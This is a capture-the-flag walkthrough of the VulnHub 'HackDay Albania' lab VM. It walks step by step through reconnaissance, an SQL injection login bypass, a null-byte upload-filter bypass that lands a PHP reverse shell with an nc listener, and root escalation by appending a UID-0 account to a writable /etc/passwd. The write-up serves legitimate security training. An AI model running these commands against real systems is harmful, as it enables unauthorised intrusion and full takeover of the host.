[Vulnhub] Hackday Albania 2016

Reconnaissance

Lets do this, so we have this VM from VulnHub called HackDay:Albania which is a pretty awesome vm,
and it was quite a fight to pwn this box.

so after doing

arp-scan -l

we got the following ip address as a target 192.168.1.13
so now scan all the available ports on the target

nmap -v -sV -p- 192.168.1.13

which gives us the following output :

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
8008/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:98:0D:5F (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

so now we know that SSH is open and they also seem to have changed the port to the webserver to port 8008 sneaky hehe.
So lets see what is on the website, we see there is a background of mr robot, and a popup message which is being, translated to “Welcome, If I am, I know where to go;)” so i thought that would be a reference to robots.txt even if it wasnt there, its the first thing that i check when i encounter a webapplication.

http://192.168.1.13:8008/robots.txt

 

output :
Disallow: /rkfpuzrahngvat/
Disallow: /slgqvasbiohwbu/
Disallow: /tmhrwbtcjpixcv/
Disallow: /vojtydvelrkzex/
Disallow: /wpkuzewfmslafy/
Disallow: /xqlvafxgntmbgz/
Disallow: /yrmwbgyhouncha/
Disallow: /zsnxchzipvodib/
Disallow: /atoydiajqwpejc/
Disallow: /bupzejbkrxqfkd/
Disallow: /cvqafkclsyrgle/
Disallow: /unisxcudkqjydw/
Disallow: /dwrbgldmtzshmf/
Disallow: /exschmenuating/
Disallow: /fytdinfovbujoh/
Disallow: /gzuejogpwcvkpi/
Disallow: /havfkphqxdwlqj/
Disallow: /ibwglqiryexmrk/
Disallow: /jcxhmrjszfynsl/
Disallow: /kdyinsktagzotm/
Disallow: /lezjotlubhapun/
Disallow: /mfakpumvcibqvo/
Disallow: /ngblqvnwdjcrwp/
Disallow: /ohcmrwoxekdsxq/
Disallow: /pidnsxpyfletyr/
Disallow: /qjeotyqzgmfuzs/

after checking a few of them, and getting trolled with an image from a dinosaur(Philosoraptor)
this will give us a different message

http://192.168.1.13:8008/unisxcudkqjydw
IS there any /vulnbank/ in there ???

alright so we have a hint there might be a folder called /vulnbank/ in here
so we traverse to this folder and yup, it has a directory listing vulnerability showing us a client folder,
and when we click on the folder named client, we get the bank website.

lets pwn the bank

on the bank website we see there is a username and password form, so lets see if the username form is vulnerable to sql injection

so lets type in ‘ in the username form

Warning: mysqli_fetch_assoc() expects parameter 1 to be mysqli_result, boolean given in /var/www/html/unisxcudkqjydw/vulnbank/client/config.php on line 102

so at first i tried to use sqlmap, and then dump the database, however this was not working since i couldnt retrieve any DBMS names
so then i tried to bypass the login form with ‘# to comment out the rest, it didnt returned an error message so we need a user now
lets intercept the request and send that to burp suite intruder,

username=§user§' #&password=foobar

after bruting the username with burpsuite this is the final payload to bypass the login form

jeff'#

 

bypassing the ticket system

awesome we bypassed the login, now lets see if we can loot this bank haha.
we can see there is a ticket upload system on the right side of the app, I am pretty sure we need to upload a shell, by using the file upload, within the ticket system

first i tried uploading a normal .php file and we got the following error :

After we got hacked we our allowing only image files to upload such as jpg , jpeg , bmp etc...

ok so we need to bypass this protection, lets try uploading a php file with .php%00.jpg the old nullbyte trick
and the file is successfully uploaded, lets try to view it by dragging the broken image icon to the url bar

and we get the following error

Warning: include(): Failed opening 'upload/php-reverse-shell.php' for inclusion (include_path='.:/usr/share/php') in /var/www/html/unisxcudkqjydw/vulnbank/client/view_file.php on line 13

 

Getting shell

we get an include error so apparently there is a include function into the php code, so we can just upload a jpeg, with phpcode embedded into it, and then it will execute the php code in the image, and return a shell to us

i used a pentestmonkey php reverse shell, but also tried it with a msfvenom meterpreter reverse_tcp and that worked aswell, so now just setup a nc listener and catch your shell

nc -lvp 4444

no we can go back to our ticket, and view the file and we receive the shell ^_^
note : that if you want to catch a meterpreter shell you need to setup a multi/handler first.

now we have the shell, we can try to get a TTY shell with python, however in this case python was not installed, so i used this

script /dev/null -c bash

voila now we have a TTY Shell

Escalating privileges

now we need to see how to get root on the box, first i checked the /home folder but there was only a single user there nothing interesting

lets see if we have any writeable files, we can write to

find / -writable -type f 2>/dev/null

we can see we have /etc/passwd, so if we add a user there with root privileges we should have root, so we copy the passwd file to our box,lets make a hashed password by using

openssl passwd -1
Password:
Verifying - Password:
$1$snYvkX/A$Mk6h7Oxwx90/DotTuZJdv

test is the password

rootaccess:$1$snYvkX/A$Mk6h7Oxwx90/DotTuZJdv:0:0:rootaccess:/root:/bin/bash

lets save the file and encode it in base64 so we can paste it over, note : dont forget the -w 0 otherwise you have problems to paste it over

cat passwd | base64 -w 0

now lets copy the base64 encoded string, pipe it then decode it and replace that with the passwd file on the target

echo "b64stringhere" | base64 -d >> /etc/passwd

now lets see if the /etc/passwd file got changed, by our user

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
taviso:x:1000:1000:Taviso,,,:/home/taviso:/bin/bash
rootaccess:$1$snYvkX/A$Mk6h7Oxwx90/DotTuZJdv:0:0:rootaccess:/root:/bin/bash

now we can login as the new user we created by doing

su rootaccess

and we got root to the b0x YEAH!  ^_^
so all we have to do now is cat the flag

cat flag.txt

cx0kv1xwgaaxmm_-jpg-large

The End.
thanks for reading my writeup.

Advertisements